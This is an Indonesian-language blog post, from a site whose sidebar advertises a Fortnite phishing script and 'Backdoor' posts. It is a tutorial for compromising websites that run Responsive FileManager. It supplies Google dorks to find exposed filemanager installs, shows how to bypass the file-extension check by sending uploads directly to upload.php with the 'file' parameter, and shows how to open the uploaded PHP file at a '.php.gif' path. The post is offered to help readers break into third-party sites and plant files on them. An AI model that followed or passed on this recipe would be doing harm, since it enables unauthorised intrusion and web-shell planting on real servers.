Labels

Powered by Blogger.

ur-solution

chase what you want

Featured Post

Script Phising Fortnite - Redeem Season 8

Script Phising Fortnite - Redeem Season 8 1. Event Display 2. Login Display 3. Display After Login Note : u can...

Search This Blog

Blog Archive

Categories

Backdoor (5) Script (1) Tutorials (12)

Blogger templates

Blogger news

ngewek

haha

Recent Posts

About

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

Responsive FileManager Bypass File Upload

Responsive FileManager Bypass File Upload


dork:inurl:"/tinymce/plugins/filemanager/" site:nl
     "/plugins/filemanager/" ext:pdf
exploit :/filemanager/dialog.php 


Langsung saja
Kalau sudah dapet filemanager hasil dorking dan kalian upload file ext php,php.fla,php.accdb dan hasilnya nihil atau muncul pesan "File extension is not allowed."


Kini kalian bisa coba bypass file upload dengan CSRF (Cross-site Request Forgery) dengan parameter "file"
ganti "/filemanager/dialog.php" menjadi "/filemanager/upload.php"
dan cara cek kalau bisa di bypass maka akan blank seperti di gambar 


Langsung masuk ke CSRF Nya 
Masukan site nya 

example :site.com/plugins/filemanager/upload.php
parameter :file

dan upload file mu
akses filemu di /filemanager/urfile.php.gif

*Tidak semua site yang bisa di bypass seperti ini

Sekian Dari saya Thanks For Visit :D